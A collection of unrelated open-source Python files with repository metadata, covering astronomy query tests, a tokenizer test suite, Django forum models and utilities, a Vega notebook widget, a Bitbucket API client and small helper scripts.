@pytest.mark.parametrize(("coordinates"), OBJ_LIST)
def test_query_region_cone(coordinates, patch_get):
result = Irsa.query_region(
coordinates, catalog='fp_psc', spatial='Cone', radius=2 * u.arcmin)
assert isinstance(result, Table)
@pytest.mark.parametrize(("coordinates"), OBJ_LIST)
def test_query_region_box_async(coordinates, patch_get):
response = Irsa.query_region_async(
coordinates, catalog='fp_psc', spatial='Box',
width=2 * u.arcmin, get_query_payload=True)
assert response['size'] == 120
response = Irsa.query_region_async(
coordinates, catalog='fp_psc', spatial='Box', width=2 * u.arcmin)
assert response is not None
@pytest.mark.parametrize(("coordinates"), OBJ_LIST)
def test_query_region_box(coordinates, patch_get):
result = Irsa.query_region(
coordinates, catalog='fp_psc', spatial='Box', width=2 * u.arcmin)
assert isinstance(result, Table)
# The same triangle near (10, 10) deg, given first as SkyCoord objects ...
poly1 = [coord.SkyCoord(ra=10.1, dec=10.1, unit=(u.deg, u.deg)),
         coord.SkyCoord(ra=10.0, dec=10.1, unit=(u.deg, u.deg)),
         coord.SkyCoord(ra=10.0, dec=10.0, unit=(u.deg, u.deg))]
# ... and then as plain (ra, dec) Quantity tuples.
poly2 = [(10.1 * u.deg, 10.1 * u.deg), (10.0 * u.deg, 10.1 * u.deg),
         (10.0 * u.deg, 10.0 * u.deg)]
@pytest.mark.parametrize(("polygon"), [poly1, poly2])
def test_query_region_async_polygon(polygon, patch_get):
response = Irsa.query_region_async(
"m31", catalog="fp_psc", spatial="Polygon",
polygon=polygon, get_query_payload=True)
for a, b in zip(re.split("[ ,]", response["polygon"]),
re.split("[ ,]", "10.1 +10.1,10.0 +10.1,10.0 +10.0")):
for a1, b1 in zip(a.split(), b.split()):
a1 = float(a1)
b1 = float(b1)
np.testing.assert_almost_equal(a1, b1)
response = Irsa.query_region_async(
"m31", catalog="fp_psc", spatial="Polygon", polygon=polygon)
assert response is not None
@pytest.mark.parametrize(("polygon"),
[poly1,
poly2,
])
def test_query_region_polygon(polygon, patch_get):
result = Irsa.query_region(
"m31", catalog="fp_psc", spatial="Polygon", polygon=polygon)
assert isinstance(result, Table)
@pytest.mark.parametrize(('spatial', 'result'),
                         zip(('Cone', 'Box', 'Polygon', 'All-Sky'),
                             ('Cone', 'Box', 'Polygon', 'NONE')))
def test_spatial_valdi(spatial, result):
    """Each accepted spatial keyword maps to its server-side name.

    NOTE(review): the function name looks like a typo for
    ``test_spatial_valid``; left unchanged to avoid churn.
    """
    out = Irsa._parse_spatial(
        spatial, coordinates='m31', radius=5 * u.deg, width=5 * u.deg,
        polygon=[(5 * u.hour, 5 * u.deg)] * 3)
    assert out['spatial'] == result
@pytest.mark.parametrize(('spatial'), [('cone', 'box', 'polygon', 'all-Sky',
                                        'All-sky', 'invalid', 'blah')])
def test_spatial_invalid(spatial):
    # NOTE(review): the parametrize list holds a single tuple, so `spatial`
    # is the whole tuple rather than each string in turn - presumably
    # unintended, though a tuple is rejected as well; confirm before changing.
    with pytest.raises(ValueError):
        Irsa._parse_spatial(spatial, coordinates='m31')
def test_deprecated_namespace_import_warning():
    """Importing the old ``astroquery.irsa`` namespace must warn."""
    with pytest.raises(DeprecationWarning) if False else pytest.warns(DeprecationWarning):
        import astroquery.irsa
| {
"content_hash": "fcae81da23c13c8e6d1ac4f22a5bbe1f",
"timestamp": "",
"source": "github",
"line_count": 176,
"max_line_length": 80,
"avg_line_length": 33.89772727272727,
"alnum_prop": 0.6015755950385518,
"repo_name": "ceb8/astroquery",
"id": "abc7064168777408c31663bb3f522a388cadf532",
"size": "6031",
"binary": false,
"copies": "1",
"ref": "refs/heads/track_master",
"path": "astroquery/ipac/irsa/tests/test_irsa.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "756486"
},
{
"name": "Python",
"bytes": "2760787"
}
],
"symlink_target": ""
} |
"""
test_tokenizer
~~~~~~~~~~~~~~
Tests for the :mod:`~pai_parser.tokenizer` module.
"""
import collections
import pytest
import shlex
from pai_parser import tokenizer
@pytest.mark.parametrize('data', [
    int(),
    float(),
    list(),
    tuple(),
    dict(),
    set(),
    object()
])
def test_lexer_raises_on_non_str(data):
    """
    Assert that :meth:`~tokenizer._lexer` raises a :class:`~ValueError` exception when
    the `data` parameter is not a string.
    """
    # One default-constructed instance of each common non-string type.
    with pytest.raises(ValueError):
        tokenizer._lexer(data)
@pytest.mark.parametrize('data', [
    b'foo',
    b'bar',
    b'foo:bar',
    b'foo:bar:baz'
])
def test_lexer_handles_bytes(data):
    """
    Assert that :meth:`~tokenizer._lexer` returns a :class:`~shlex.shlex` instance when given a valid byte string.
    """
    # Byte strings with zero or more ':' delimiters must be accepted like str.
    assert isinstance(tokenizer._lexer(data), shlex.shlex)
def test_lexer_returns_shlex_instance(valid_data_string):
    """
    Assert that :meth:`~tokenizer._lexer` returns a :class:`~shlex.shlex` instance when given a valid string.
    """
    # `valid_data_string` is a fixture defined outside this module (conftest).
    assert isinstance(tokenizer._lexer(valid_data_string), shlex.shlex)
def test_lexer_sets_delimiter_whitespace_attribute(valid_delimiter):
    """
    Assert that :meth:`~tokenizer._lexer` returns a :class:`~shlex.shlex` instance with the `whitespace` attribute
    properly set to the given value.
    """
    # `valid_delimiter` is a fixture defined outside this module (conftest).
    lexer = tokenizer._lexer('', delimiter=valid_delimiter)
    assert lexer.whitespace == valid_delimiter
def test_tokenize_iter_returns_iterator():
    """
    Assert that :meth:`~tokenizer.tokenize_iter` returns an object that implements the iterator protocol.
    """
    # collections.Iterator was deprecated since Python 3.3 and removed in
    # Python 3.10; the ABC lives in collections.abc.
    import collections.abc
    assert isinstance(tokenizer.tokenize_iter(''), collections.abc.Iterator)
def test_tokenize_iter_yields_nothing_on_empty_data():
    """
    Assert that :meth:`~tokenizer.tokenize_iter` returns an empty iterator when given an empty string.
    """
    # An exhausted iterator raises StopIteration on its first next() call.
    with pytest.raises(StopIteration):
        next(tokenizer.tokenize_iter(''))
def test_tokenize_returns_list():
    """
    Assert that :meth:`~tokenizer.tokenize` returns a :class:`list` instance.
    """
    # Empty input is acceptable; only the return type is under test here.
    assert isinstance(tokenizer.tokenize(''), list)
| {
"content_hash": "390d2ffbb3edf2a8986d1015cd069e8c",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 114,
"avg_line_length": 26.765432098765434,
"alnum_prop": 0.6646678966789668,
"repo_name": "ahawker/pai-parser",
"id": "97460cba50e317fedeb9a34a09038e25e8740c0f",
"size": "2168",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_tokenizer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "968"
},
{
"name": "Python",
"bytes": "24596"
}
],
"symlink_target": ""
} |
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth.signals import user_logged_in
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db import models
from easy_thumbnails.fields import ThumbnailerImageField
from . import validators
class Profile(models.Model):
    """
    A userprofile model that provides a short_info, twitter handle, website URL, avatar
    field and details about number/age of accompanying children
    This is also used as AUTH_PROFILE_MODULE.
    """
    # Exactly one profile per auth user.
    user = models.OneToOneField(User)
    short_info = models.TextField(_('short info'), blank=True)
    # Stored under MEDIA_ROOT/avatars; easy_thumbnails generates resized copies.
    avatar = ThumbnailerImageField(_('avatar'), upload_to='avatars', null=True,
        blank=True,
        help_text=_('Please upload an image with a side length of at least 300 pixels.'))
    num_accompanying_children = models.PositiveIntegerField(_('Number of accompanying children'),
        null=True,
        blank=True,
        default=0)
    # Free text rather than a number - presumably to allow ranges; confirm.
    age_accompanying_children = models.CharField(_("Age of accompanying children"), blank=True, max_length=20)
    # Handle is validated by validators.twitter_username.
    twitter = models.CharField(_("Twitter"), blank=True, max_length=20,
        validators=[validators.twitter_username])
    website = models.URLField(_("Website"), blank=True)
    organisation = models.TextField(_('organisation'), blank=True)
@receiver(user_logged_in)
def show_logged_in_message(request, user, **kwargs):
    """Flash a success message whenever a user logs in."""
    # fail_silently avoids an error when the messages framework is unavailable.
    messages.success(request, _("You've logged in successfully."),
                     fail_silently=True)
| {
"content_hash": "468d211d4d8a18766de2f15550caec9b",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 116,
"avg_line_length": 45.87179487179487,
"alnum_prop": 0.6327557294577977,
"repo_name": "zerok/pyconde-website-mirror",
"id": "28be9f51543d274e59aeecd6b7a7bc46b167e603",
"size": "1813",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "pyconde/accounts/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "370341"
},
{
"name": "JavaScript",
"bytes": "349443"
},
{
"name": "Python",
"bytes": "906774"
},
{
"name": "Shell",
"bytes": "5122"
}
],
"symlink_target": ""
} |
"""Unicode string helper functions for UTF-16/32 variability.
Python has changed from always-16-bit Unicode strings to
sometimes-16-bit/sometimes-32-bit Unicode strings,
as indicated by sys.maxunicode.
The helper functions here deal with the differences.
"""
__author__ = "Markus Scherer"
import sys
class _UTF16(object):
  @staticmethod
  def CodePointString(cp):
    """Return the UTF-16 string for code point *cp* as a surrogate pair."""
    # divmod(cp, 0x400) == (cp >> 10, cp & 0x3ff) for any non-negative cp;
    # 0xd7c0 is the lead-surrogate base pre-biased by 0x10000 >> 10.
    lead, trail = divmod(cp, 0x400)
    return unichr(0xd7c0 + lead) + unichr(0xdc00 + trail)
class _UTF32(object):
  @staticmethod
  def CodePointString(cp):
    # Wide build: a single unichr() covers the full code-point range.
    return unichr(cp)
# Pick the implementation matching this interpreter's Unicode string width.
if sys.maxunicode == 0xffff:
  UTF = _UTF16  # narrow build: supplementary planes need surrogate pairs
elif sys.maxunicode == 0x10ffff:
  UTF = _UTF32  # wide build: every code point fits in a single unichr()
else:
  raise ValueError("unexpected sys.maxunicode = 0x%x" % sys.maxunicode)
| {
"content_hash": "2da27fdf41a507597c45dec4e4c87e66",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 71,
"avg_line_length": 22.64516129032258,
"alnum_prop": 0.7222222222222222,
"repo_name": "zentertainzhaomingliang/emoji4unicode",
"id": "92bd875c6ba033796551e13a7315a3a34c53264a",
"size": "1302",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "src/utf.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "150736"
},
{
"name": "Shell",
"bytes": "3191"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import contextlib
import json
import uuid
import sys
try:
from ipywidgets import DOMWidget
from traitlets import Unicode, Dict
except ImportError as err:
new_err = ImportError(
"vega.widget requires ipywidgets, which could not be imported. "
"Is ipywidgets installed?"
)
# perform manual exception chaining for python 2 compat
new_err.__cause__ = err
raise new_err
__all__ = ['VegaWidget']
class VegaWidget(DOMWidget):
    """An IPython widget displaying a vega chart.
    Specifying the spec directly::
        widget = VegaWidget({...})
        widget.update(remove='datum.t < 5', insert=[{...}, {...}])
    To modify the created plot, additional options can be passed as in::
        widget = VegaWidget(spec, opt)
    Usage with ``altair``::
        widget = VegaWidget(chart.to_dict())
    To select between vega and vega-lite use the ``$schema`` property on
    the ``spec`` dictionary.
    The chart can be updated by setting the ``spec`` property. In addition
    embedding options, such as the used theme, can be set via the ``opt``
    property::
        widget.spec = {...}
        widget.opt = {"theme": "dark"}
    For streaming data, setting the whole spec may be slow. For this use case,
    ``VegaWidget`` offers the ``update`` method. It sends the data to the
    client without persisting it on the Python side. In particular resetting
    the ``spec`` and ``opt`` properties will lose any data changes performed
    via ``update``.
    """
    # Implementation note: there is a small delay between defining the widget
    # and its display in the frontend. Any message sent during this time
    # interval will be silently ignored by the client. To ensure all updates
    # are handled, they are buffered on the python side until the widget is
    # first displayed. The buffer is the `_pending_updates` attribute and the
    # display state is reflected by the `_displayed` attribute.
    # Traitlets synced with the JS view (nbextensions/jupyter-vega/widget).
    _view_name = Unicode('VegaWidget').tag(sync=True)
    _view_module = Unicode('nbextensions/jupyter-vega/widget').tag(sync=True)
    _view_module_version = Unicode('0.1.0').tag(sync=True)
    # Spec/options travel as JSON strings; 'null' mirrors json.dumps(None).
    _spec_source = Unicode('null').tag(sync=True)
    _opt_source = Unicode('null').tag(sync=True)
    def __init__(self, spec=None, opt=None, **kwargs):
        """Create the widget with an optional spec and embed options."""
        super().__init__(**kwargs)
        self._spec_source = json.dumps(spec)
        self._opt_source = json.dumps(opt)
        self._displayed = False
        self._pending_updates = []
        self.on_msg(self._handle_message)
    def _handle_message(self, widget, msg, _):
        # The client announces itself with a "display" message; at that point
        # flush everything buffered beforehand (see implementation note).
        if msg['type'] != "display":
            return
        if self._displayed:
            return
        self._displayed = True
        if not self._pending_updates:
            return
        self.send(dict(type="update", updates=self._pending_updates))
        self._pending_updates = []
    def _reset(self):
        # Replacing spec/opt invalidates buffered updates and display state.
        self._displayed = False
        self._pending_updates = []
    @property
    def spec(self):
        # Deserialized view of the synced JSON string.
        return json.loads(self._spec_source)
    @spec.setter
    def spec(self, value):
        self._spec_source = json.dumps(value)
        self._reset()
    @property
    def opt(self):
        # Deserialized view of the synced JSON string.
        return json.loads(self._opt_source)
    @opt.setter
    def opt(self, value):
        self._opt_source = json.dumps(value)
        self._reset()
    def update(self, key, remove=None, insert=None):
        """Update the chart data.
        Updates are only reflected on the client, i.e., after re-displaying
        the widget will show the chart specified in its spec property.
        :param key:
            identifier of the data set to modify - presumably the name of a
            dataset inside the spec; confirm against the JS widget code.
        :param Optional[str] remove:
            a JavaScript expression of items to remove. The item to test can
            be accessed as ``datum``. For example, the call
            ``update(remove="datum.t < 5")`` removes all items with the
            property ``t < 5``.
        :param Optional[List[dict]] insert:
            new items to add to the chart data.
        """
        update = dict(key=key)
        if remove is not None:
            update['remove'] = remove
        if insert is not None:
            update['insert'] = insert
        # Buffer until the frontend confirms display, otherwise the message
        # would be silently dropped (see implementation note above).
        if self._displayed:
            self.send(dict(type="update", updates=[update]))
        else:
            self._pending_updates.append(update)
| {
"content_hash": "31f93ea24d410ed5005afd0f8110bdcf",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 78,
"avg_line_length": 29.96551724137931,
"alnum_prop": 0.6197928653624856,
"repo_name": "uwdata/ipython-vega",
"id": "d87486bcbe298d834027bfdcc2d64de1e5fd4222",
"size": "4345",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vega/widget.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "865"
},
{
"name": "JavaScript",
"bytes": "377"
},
{
"name": "Jupyter Notebook",
"bytes": "7694504"
},
{
"name": "Python",
"bytes": "6556"
}
],
"symlink_target": ""
} |
"""
Created on Wed Jun 8 12:02:40 2016
@author: ericgrimson
"""
cube = 27
epsilon = 0.01
guess = 0.0
increment = 0.0001
num_guesses = 0
# March upward in fixed-size steps until guess**3 lands within epsilon of cube.
while abs(guess**3 - cube) >= epsilon:
    guess += increment
    num_guesses += 1
print('num_guesses =', num_guesses)
# Inverted condition, same two outcomes as the original.
if abs(guess**3 - cube) < epsilon:
    print(guess, 'is close to the cube root of', cube)
else:
    print('Failed on cube root of', cube)
| {
"content_hash": "51c6a41782b4aab4c0d03711a0ab15bf",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 54,
"avg_line_length": 19.9,
"alnum_prop": 0.6407035175879398,
"repo_name": "mkhuthir/learnPython",
"id": "6886f1d51cad05fdafd8d0a317defe170832c955",
"size": "422",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "edX_mitX_6_00_1x/L3/cubeRootApproxBetter.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7706"
}
],
"symlink_target": ""
} |
""" Defines a client class for working with a specific BitBucket repository's services. """
from bitbucket.urls import repository_services_url, repository_service_url
class BitBucketRepositoryServicesClient(object):
    """ Client class representing the services under a repository in bitbucket. """
    def __init__(self, dispatcher, access_token, access_token_secret, namespace, repository_name):
        self._dispatcher = dispatcher
        self._access_token = access_token
        self._access_token_secret = access_token_secret
        self._namespace = namespace
        self._repository_name = repository_name
    def _credentials(self):
        """ OAuth keyword arguments attached to every dispatch call. """
        return dict(access_token=self._access_token,
                    access_token_secret=self._access_token_secret)
    @property
    def namespace(self):
        """ Returns the namespace. """
        return self._namespace
    @property
    def repository_name(self):
        """ Returns the repository name. """
        return self._repository_name
    def all(self):
        """ Returns a list of the services found under the repository. """
        url = repository_services_url(self._namespace, self._repository_name)
        return self._dispatcher.dispatch(url, **self._credentials())
    def get(self, service_id):
        """ Returns the contents of the specified service. """
        url = repository_service_url(self._namespace, self._repository_name, service_id)
        return self._dispatcher.dispatch(url, **self._credentials())
    def delete(self, service_id):
        """ Deletes the specified service. """
        url = repository_service_url(self._namespace, self._repository_name, service_id)
        return self._dispatcher.dispatch(url, method='DELETE', **self._credentials())
    def create(self, type, **kwargs):
        """ Creates a new service. """
        url = repository_services_url(self._namespace, self._repository_name)
        return self._dispatcher.dispatch(url, method='POST', type=type,
                                         **self._credentials(), **kwargs)
| {
"content_hash": "72f69d2831773bb6136db76107d29fc4",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 96,
"avg_line_length": 46.723404255319146,
"alnum_prop": 0.6598360655737705,
"repo_name": "coreos/py-bitbucket",
"id": "ecc3de19c2eedab512438e874448c1cadd5a384d",
"size": "2196",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bitbucket/services.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "33745"
}
],
"symlink_target": ""
} |
"""Test generic alias support with mix of typing.py and stdlib types.
Possible with postponed evaluation enabled, starting with PY37.
"""
# flake8: noqa
# pylint: disable=missing-docstring,pointless-statement
# pylint: disable=too-few-public-methods,multiple-statements,line-too-long
from __future__ import annotations
import collections
import collections.abc
import contextlib
import re
import typing
# Type annotations: stdlib classes used as generic aliases (comments kept inline - this functional test's expected output is line-number sensitive)
var_orderedDict: collections.OrderedDict[int, str]
var_container: collections.abc.Container[int]
var_sequence: collections.abc.Sequence[int]
var_iterable: collections.abc.Iterable[int]
var_awaitable: collections.abc.Awaitable[int]
var_pattern: re.Pattern[int]
var_bytestring: collections.abc.ByteString
var_hashable: collections.abc.Hashable
var_ContextManager: contextlib.AbstractContextManager[int]
# No implementation required for 'builtins'
class DerivedListIterable(typing.List[typing.Iterable[int]]):
    pass  # list-based alias: no abstract methods, so no message expected
# Missing implementation for 'collections.abc' derived classes
class DerivedHashable(typing.Hashable): # [abstract-method] # __hash__
    pass  # intentionally missing __hash__ to trigger the message
class DerivedIterable(typing.Iterable[int]): # [abstract-method] # __iter__
    pass  # intentionally missing __iter__ to trigger the message
class DerivedCollection(typing.Collection[int]): # [abstract-method,abstract-method,abstract-method] # __contains__, __iter__, __len__
    pass  # intentionally missing all three abstract methods
| {
"content_hash": "6e5f4f17a1707b4d442750b57fe07efd",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 136,
"avg_line_length": 32.31707317073171,
"alnum_prop": 0.780377358490566,
"repo_name": "ruchee/vimrc",
"id": "cb7a4d0f43a62f2d743f15e26872f10e3ee9f082",
"size": "1325",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vimfiles/bundle/vim-python/submodules/pylint/tests/functional/g/generic_alias/generic_alias_mixed_py37.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "22028"
},
{
"name": "Blade",
"bytes": "3314"
},
{
"name": "C#",
"bytes": "1734"
},
{
"name": "CSS",
"bytes": "31547"
},
{
"name": "Clojure",
"bytes": "47036"
},
{
"name": "CoffeeScript",
"bytes": "9274"
},
{
"name": "Common Lisp",
"bytes": "54314"
},
{
"name": "D",
"bytes": "11562"
},
{
"name": "Dockerfile",
"bytes": "7620"
},
{
"name": "Elixir",
"bytes": "41696"
},
{
"name": "Emacs Lisp",
"bytes": "10489"
},
{
"name": "Erlang",
"bytes": "137788"
},
{
"name": "F#",
"bytes": "2230"
},
{
"name": "Go",
"bytes": "54655"
},
{
"name": "HTML",
"bytes": "178954"
},
{
"name": "Haml",
"bytes": "39"
},
{
"name": "Haskell",
"bytes": "2031"
},
{
"name": "JavaScript",
"bytes": "9086"
},
{
"name": "Julia",
"bytes": "9540"
},
{
"name": "Kotlin",
"bytes": "8669"
},
{
"name": "Less",
"bytes": "327"
},
{
"name": "Makefile",
"bytes": "87500"
},
{
"name": "Mustache",
"bytes": "3375"
},
{
"name": "Nix",
"bytes": "1860"
},
{
"name": "PHP",
"bytes": "9238"
},
{
"name": "PLpgSQL",
"bytes": "33747"
},
{
"name": "Perl",
"bytes": "84200"
},
{
"name": "PostScript",
"bytes": "3891"
},
{
"name": "Python",
"bytes": "7366233"
},
{
"name": "Racket",
"bytes": "1150"
},
{
"name": "Raku",
"bytes": "21146"
},
{
"name": "Ruby",
"bytes": "133344"
},
{
"name": "SCSS",
"bytes": "327"
},
{
"name": "Sass",
"bytes": "308"
},
{
"name": "Scala",
"bytes": "13125"
},
{
"name": "Shell",
"bytes": "52916"
},
{
"name": "Smarty",
"bytes": "300"
},
{
"name": "Swift",
"bytes": "11436"
},
{
"name": "TypeScript",
"bytes": "4663"
},
{
"name": "Vim Script",
"bytes": "10545492"
},
{
"name": "Vim Snippet",
"bytes": "559139"
}
],
"symlink_target": ""
} |
"""Package init file for telluride_decoding.
"""
# No imports here, instead use
# from telluride_decoding import XXX
# where XXX is the individual file name.
| {
"content_hash": "0bb204a291dcb0b5d3b1ad39f060567a",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 44,
"avg_line_length": 27,
"alnum_prop": 0.7345679012345679,
"repo_name": "google/telluride_decoding",
"id": "b0f7080797f68e2de9774f10e236fb174306798b",
"size": "819",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "telluride_decoding/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "78749"
},
{
"name": "Python",
"bytes": "636978"
},
{
"name": "Starlark",
"bytes": "4757"
}
],
"symlink_target": ""
} |
from datetime import datetime
import os.path
import random
import re
from HTMLParser import HTMLParser
try:
import markdown
except ImportError:
pass
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import HttpResponse, Http404
from django.utils.functional import Promise
from django.utils.translation import force_unicode, check_for_language
from django.utils.simplejson import JSONEncoder
from django import forms
from django.template.defaultfilters import urlize as django_urlize
from django.core.paginator import Paginator, EmptyPage, InvalidPage
from django.contrib.sites.models import Site
from django.conf import settings
from djangobb_forum import settings as forum_settings
from djangobb_forum.markups import bbmarkup
# Pre-compile the smile regexps once at import: (compiled_pattern, image_path).
_SMILES = [(re.compile(smile_re), path) for smile_re, path in forum_settings.SMILES]
def render_to(template):
    """
    Decorator for Django views that sends returned dict to render_to_response function.
    Template name can be decorator parameter or TEMPLATE item in returned dictionary.
    RequestContext always added as context instance.
    If view doesn't return dict then decorator simply returns output.
    Parameters:
     - template: template name to use
    Examples:
    # 1. Template name in decorator parameters
    @render_to('template.html')
    def foo(request):
        bar = Bar.object.all()
        return {'bar': bar}
    # 2. Template name as TEMPLATE item value in return dictionary
    @render_to()
    def foo(request, category):
        template_name = '%s.html' % category
        return {'bar': bar, 'TEMPLATE': template_name}
    """
    import functools
    def renderer(function):
        # functools.wraps preserves the view's __name__/__doc__ for URL
        # resolvers and debugging (the original wrapper hid them).
        @functools.wraps(function)
        def wrapper(request, *args, **kwargs):
            output = function(request, *args, **kwargs)
            if not isinstance(output, dict):
                return output
            # A TEMPLATE key in the returned dict overrides the decorator arg.
            tmpl = output.pop('TEMPLATE', template)
            return render_to_response(tmpl, output, context_instance=RequestContext(request))
        return wrapper
    return renderer
def absolute_url(path):
    """Prefix *path* with the current site's domain to build a full URL."""
    domain = Site.objects.get_current().domain
    return 'http://%s%s' % (domain, path)
def paged(paged_list_name, per_page):
    """
    Parse page from GET data and pass it to view. Split the
    query set returned from view.

    The view must return a dict containing a 'paged_qs' key; anything else
    is passed through unchanged. Pagination info is added to the dict under
    'page', 'page_list', 'pages' and 'per_page'.
    """
    def decorator(func):
        def wrapper(request, *args, **kwargs):
            result = func(request, *args, **kwargs)
            if not isinstance(result, dict) or 'paged_qs' not in result:
                return result
            # A malformed ?page= value falls back to the first page.
            try:
                page = int(request.GET.get('page', 1))
            except ValueError:
                page = 1
            # Removed: a block of commented-out per-page override code and a
            # redundant local import of Paginator (already imported at module
            # level).
            paginator = Paginator(result['paged_qs'], per_page)
            try:
                result[paged_list_name] = paginator.page(page).object_list
            except (InvalidPage, EmptyPage):
                raise Http404
            result['page'] = page
            result['page_list'] = range(1, paginator.num_pages + 1)
            result['pages'] = paginator.num_pages
            result['per_page'] = per_page
            result['request'] = request
            return result
        return wrapper
    return decorator
def ajax(func):
    """
    Checks request.method is POST. Return error in JSON in other case.
    If view returned dict, returns JsonResponse with this dict as content.
    """
    def wrapper(request, *args, **kwargs):
        if request.method == 'POST':
            try:
                response = func(request, *args, **kwargs)
            except Exception:
                # Bug fix: `traceback` was referenced without ever being
                # imported, turning any view error into a NameError.
                import traceback
                response = {'error': traceback.format_exc()}
        else:
            response = {'error': {'type': 403, 'message': 'Accepts only POST request'}}
        if isinstance(response, dict):
            return JsonResponse(response)
        else:
            return response
    return wrapper
class LazyJSONEncoder(JSONEncoder):
    """
    JSONEncoder that can also serialize Django lazy translation strings
    (``Promise`` instances) by forcing them to unicode first.
    """
    def default(self, o):
        # Lazy translation objects are not directly JSON-serializable.
        if isinstance(o, Promise):
            return force_unicode(o)
        else:
            return super(LazyJSONEncoder, self).default(o)
class JsonResponse(HttpResponse):
    """
    HttpResponse subclass that serializes data into JSON format.
    """
    def __init__(self, data, mimetype='application/json'):
        # Encode with LazyJSONEncoder so lazy translation strings survive.
        json_data = LazyJSONEncoder().encode(data)
        super(JsonResponse, self).__init__(
            content=json_data, mimetype=mimetype)
def build_form(Form, _request, GET=False, *args, **kwargs):
    """
    Shortcut for building the form instance of the given form class.

    Binds the form to POST data (or to GET data when ``GET`` is true) if the
    request method matches; otherwise an unbound form is returned.
    """
    method = _request.method
    if not GET and method == 'POST':
        return Form(_request.POST, _request.FILES, *args, **kwargs)
    if GET and method == 'GET':
        return Form(_request.GET, _request.FILES, *args, **kwargs)
    return Form(*args, **kwargs)
class ExcludeTagsHTMLParser(HTMLParser):
    """
    Class for html parsing with excluding specified tags.

    Rebuilds the document, applying ``func`` to every text node that is not
    inside one of ``tags``. After ``feed`` the result is in ``self.html``.
    """
    def __init__(self, func, tags=('a', 'code')):
        HTMLParser.__init__(self)
        self.func = func            # transformation applied to text nodes
        self.is_ignored = False     # True while inside an excluded tag
        self.tags = tags            # tags whose text content is left alone
        self.html = []              # output fragments; joined in feed()
    def handle_starttag(self, tag, attrs):
        self.html.append('<%s%s>' % (tag, self.__html_attrs(attrs)))
        if tag in self.tags:
            self.is_ignored = True
    def handle_data(self, data):
        if not self.is_ignored:
            data = self.func(data)
        self.html.append(data)
    def handle_startendtag(self, tag, attrs):
        self.html.append('<%s%s/>' % (tag, self.__html_attrs(attrs)))
    def handle_endtag(self, tag):
        # NOTE(review): ANY end tag re-enables processing, so a nested tag
        # inside an excluded tag ends the exclusion early - confirm intended.
        self.is_ignored = False
        self.html.append('</%s>' % (tag))
    def handle_entityref(self, name):
        self.html.append('&%s;' % name)
    def handle_charref(self, name):
        self.html.append('&#%s;' % name)
    def unescape(self, s):
        #we don't need unescape data (without this possible XSS-attack)
        return s
    def __html_attrs(self, attrs):
        # Rebuild an attribute string like ' a="1" b="2"' (or '' if none).
        _attrs = ''
        if attrs:
            _attrs = ' %s' % (' '.join([('%s="%s"' % (k,v)) for k,v in attrs]))
        return _attrs
    def feed(self, data):
        HTMLParser.feed(self, data)
        # Collapse the fragment list into the final output string.
        self.html = ''.join(self.html)
def urlize(data):
    """Urlize plain-text links in *data*, skipping the contents of A and CODE tags."""
    parser = ExcludeTagsHTMLParser(django_urlize)
    parser.feed(data)
    result = parser.html
    parser.close()
    return result
def _smile_replacer(data):
    """Apply every configured smile substitution to *data* in order."""
    for pattern, replacement in _SMILES:
        data = pattern.sub(replacement, data)
    return data
def smiles(data):
    """Replace text smiles in *data*, skipping A and CODE tag contents."""
    parser = ExcludeTagsHTMLParser(_smile_replacer)
    parser.feed(data)
    result = parser.html
    parser.close()
    return result
def paginate(items, request, per_page, total_count=None):
    """Split *items* into pages; return (num_pages, paginator, current objects)."""
    raw_page = request.GET.get('page', 1)
    try:
        page_number = int(raw_page)
    except ValueError:
        page_number = 1
    paginator = Paginator(items, per_page)
    try:
        current_objects = paginator.page(page_number).object_list
    except (InvalidPage, EmptyPage):
        raise Http404
    return paginator.num_pages, paginator, current_objects
def set_language(request, language, response=None):
    """
    Change the language of session of authenticated user.

    Bug fix: the cookie branch referenced an undefined name ``response``
    and always raised NameError. The response to attach the cookie to can
    now be passed via the new optional, backward-compatible ``response``
    parameter; without it, the cookie branch is a no-op.
    """
    if language and check_for_language(language):
        if hasattr(request, 'session'):
            request.session['django_language'] = language
        elif response is not None:
            response.set_cookie(settings.LANGUAGE_COOKIE_NAME, language)
def convert_text_to_html(text, markup):
    """
    Render *text* written in *markup* ('bbcode' or 'markdown') to HTML,
    then urlize any plain-text links in the result.

    Raises:
        ValueError: for an unknown markup name.  (ValueError is a
        subclass of the bare Exception raised previously, so existing
        ``except Exception`` handlers still work.)
    """
    if markup == 'bbcode':
        text = bbmarkup.bbcode(text)
    elif markup == 'markdown':
        text = markdown.markdown(text, safe_mode='escape')
    else:
        raise ValueError('Invalid markup property: %s' % markup)
    return urlize(text)
| {
